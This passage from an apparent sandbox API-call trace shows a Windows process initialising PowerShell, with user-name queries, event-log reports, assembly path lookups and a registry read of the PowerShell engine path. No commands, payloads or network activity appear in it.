nSize=0xce434) returned 0x1 [0079.181] GetLastError () returned 0xcb [0079.181] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.182] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3214aa4*="Function", lpRawData=0x3214960) returned 1 [0079.182] GetLastError () returned 0x0 [0079.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.187] GetLastError () returned 0xcb [0079.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.195] GetLastError () returned 0xcb [0079.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.195] GetLastError () returned 0xcb [0079.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.196] GetLastError () returned 0xcb [0079.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.196] GetLastError () returned 0xcb [0079.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.261] GetLastError () returned 0xcb [0079.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.261] GetLastError () returned 0xcb [0079.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcddf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.261] GetLastError () returned 0xcb [0079.263] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.264] GetLastError () returned 0xcb [0079.264] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.264] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x322db3c*="Registry", lpRawData=0x322d9f8) returned 1 [0079.265] GetLastError () returned 0x0 [0079.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.267] GetLastError () returned 0x0 [0079.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.267] GetLastError () returned 0x0 [0079.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.268] GetLastError () returned 0x0 [0079.307] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.308] GetLastError () returned 0x0 [0079.308] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.309] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3231900*="Variable", lpRawData=0x32317bc) returned 1 [0079.309] GetLastError () returned 0x0 [0079.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.312] GetLastError () returned 0xcb [0079.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.316] GetLastError () returned 0xcb [0079.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcde34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.318] GetLastError () returned 0xcb [0079.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.318] GetLastError () returned 0xcb [0079.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.318] GetLastError () returned 0xcb [0079.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcdde4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.319] GetLastError () returned 0xcb [0079.424] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce434 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce434) returned 0x1 [0079.424] GetLastError () returned 0x3 [0079.424] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce43c | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce43c) returned 1 [0079.425] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x323f6a8*="Certificate", lpRawData=0x323f564) returned 1 [0079.426] GetLastError () returned 0x0 [0079.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.451] GetLastError () returned 0xcb [0079.454] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2d1690 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop") returned 0x22 [0079.454] GetLastError () returned 0xcb [0079.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.457] GetLastError () returned 0xcb [0079.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.457] GetLastError () returned 0xcb [0079.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.513] GetLastError () returned 0xcb [0079.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.517] GetLastError () returned 0xcb [0079.518] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.518] GetLastError () returned 0xcb [0079.518] SetErrorMode (uMode=0x1) returned 0x1 [0079.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0x3246f74 | out: lpFileInformation=0x3246f74) returned 1 [0079.518] GetLastError () returned 0xcb [0079.518] SetErrorMode (uMode=0x1) returned 0x1 [0079.518] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcddfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.518] GetLastError () returned 0xcb [0079.519] SetErrorMode (uMode=0x1) returned 0x1 [0079.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0x3247124 | out: lpFileInformation=0x3247124) returned 1 [0079.519] GetLastError () returned 0xcb [0079.519] SetErrorMode (uMode=0x1) returned 0x1 [0079.524] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.524] GetLastError () returned 0xcb [0079.531] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.531] GetLastError () returned 0xcb [0079.531] SetErrorMode (uMode=0x1) returned 0x1 [0079.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", fInfoLevelId=0x0, lpFileInformation=0xce340 | out: lpFileInformation=0xce340) returned 1 [0079.531] GetLastError () returned 0xcb [0079.531] SetErrorMode (uMode=0x1) returned 0x1 [0079.531] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.531] GetLastError () returned 0xcb [0079.531] SetErrorMode (uMode=0x1) returned 0x1 [0079.532] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", fInfoLevelId=0x0, lpFileInformation=0xce340 | out: lpFileInformation=0xce340) returned 1 [0079.532] GetLastError () returned 0xcb [0079.532] SetErrorMode (uMode=0x1) returned 0x1 [0079.532] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcded4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.532] GetLastError () returned 0xcb [0079.532] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\.", nBufferLength=0x105, lpBuffer=0xcde70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.532] GetLastError () returned 0xcb [0079.532] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcdec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.532] GetLastError () returned 0xcb [0079.532] SetErrorMode (uMode=0x1) returned 0x1 [0079.532] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0xce340 | out: lpFileInformation=0xce340) returned 1 [0079.533] GetLastError () returned 0xcb [0079.533] SetErrorMode (uMode=0x1) returned 0x1 [0079.533] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcdec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.533] GetLastError () returned 0xcb [0079.533] SetErrorMode (uMode=0x1) returned 0x1 [0079.533] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0xce340 | out: lpFileInformation=0xce340) returned 1 [0079.533] GetLastError () returned 0xcb [0079.533] SetErrorMode (uMode=0x1) returned 0x1 [0079.533] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcded4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.533] GetLastError () returned 0xcb [0079.533] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcde70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.533] GetLastError () returned 0xcb [0079.534] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.534] GetLastError () returned 0xcb [0079.534] SetErrorMode (uMode=0x1) returned 0x1 [0079.534] GetFileAttributesExW (in: lpFileName="C:\\Users", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.534] GetLastError () returned 0xcb [0079.534] SetErrorMode (uMode=0x1) returned 0x1 [0079.534] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.534] GetLastError () returned 0xcb [0079.534] SetErrorMode (uMode=0x1) returned 0x1 [0079.534] GetFileAttributesExW (in: lpFileName="C:\\Users", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.535] GetLastError () returned 0xcb [0079.535] SetErrorMode (uMode=0x1) returned 0x1 [0079.535] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcdee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.535] GetLastError () returned 0xcb [0079.535] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xcde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0079.535] GetLastError () returned 0xcb [0079.535] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.535] GetLastError () returned 0xcb [0079.535] SetErrorMode (uMode=0x1) returned 0x1 [0079.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.536] GetLastError () returned 0xcb [0079.536] SetErrorMode (uMode=0x1) returned 0x1 [0079.536] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.536] GetLastError () returned 0xcb [0079.536] SetErrorMode (uMode=0x1) returned 0x1 [0079.536] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.536] GetLastError () returned 0xcb [0079.536] SetErrorMode (uMode=0x1) returned 0x1 [0079.536] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv", nBufferLength=0x105, lpBuffer=0xcdee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.536] GetLastError () returned 0xcb [0079.536] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\.", nBufferLength=0x105, lpBuffer=0xcde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv", lpFilePart=0x0) returned 0x1a [0079.536] GetLastError () returned 0xcb [0079.537] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.537] GetLastError () returned 0xcb [0079.537] SetErrorMode (uMode=0x1) returned 0x1 [0079.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.537] GetLastError () returned 0xcb [0079.537] SetErrorMode (uMode=0x1) returned 0x1 [0079.537] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcdecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.537] GetLastError () returned 0xcb [0079.537] SetErrorMode (uMode=0x1) returned 0x1 [0079.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", fInfoLevelId=0x0, lpFileInformation=0xce34c | out: lpFileInformation=0xce34c) returned 1 [0079.537] GetLastError () returned 0xcb [0079.537] SetErrorMode (uMode=0x1) returned 0x1 [0079.538] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", nBufferLength=0x105, lpBuffer=0xcdee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.538] GetLastError () returned 0xcb [0079.538] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Desktop", lpFilePart=0x0) returned 0x22 [0079.538] GetLastError () returned 0xcb [0079.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdfe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.547] GetLastError () returned 0xcb [0079.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdf94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.548] GetLastError () returned 0xcb [0079.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdf94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.548] GetLastError () returned 0xcb [0079.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcdf94, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.548] GetLastError () returned 0xcb [0079.598] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce538 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce538) returned 0x1 [0079.598] GetLastError () returned 0xcb [0079.598] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce540 | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce540) returned 1 [0079.599] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3269890*="Available", lpRawData=0x326974c) returned 1 [0079.599] GetLastError () returned 0x0 [0079.611] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce4cc | out: phkResult=0xce4cc*=0x394) returned 0x0 [0079.613] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce514, lpData=0x0, lpcbData=0xce510*=0x0 | out: lpType=0xce514*=0x1, lpData=0x0, lpcbData=0xce510*=0x56) returned 0x0 [0079.613] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce514, lpData=0x2d1690, lpcbData=0xce510*=0x56 | out: lpType=0xce514*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce510*=0x56) returned 0x0 [0079.613] RegCloseKey (hKey=0x394) returned 0x0 [0079.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.648] GetLastError () returned 0xcb [0079.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.648] GetLastError () returned 0xcb [0079.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.649] GetLastError () returned 0xcb [0079.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd614, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.649] GetLastError () returned 0xcb [0079.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.649] GetLastError () returned 0xcb [0079.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.649] GetLastError () returned 0xcb [0079.650] VirtualQuery (in: lpAddress=0xccb40, lpBuffer=0xcdb40, dwLength=0x1c | out: lpBuffer=0xcdb40*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0079.653] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.654] GetLastError () returned 0xcb [0079.665] VirtualQuery (in: lpAddress=0xccb40, lpBuffer=0xcdb40, dwLength=0x1c | out: lpBuffer=0xcdb40*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0079.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.699] GetLastError () returned 0xcb [0079.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") 